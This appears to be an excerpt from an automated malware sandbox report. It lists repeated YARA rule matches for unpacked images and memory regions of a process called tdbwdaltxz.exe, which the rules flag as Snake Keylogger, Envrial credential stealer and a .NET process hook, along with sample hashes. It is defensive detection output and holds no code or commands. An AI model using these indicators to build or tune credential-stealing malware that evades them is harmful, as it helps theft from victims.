                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
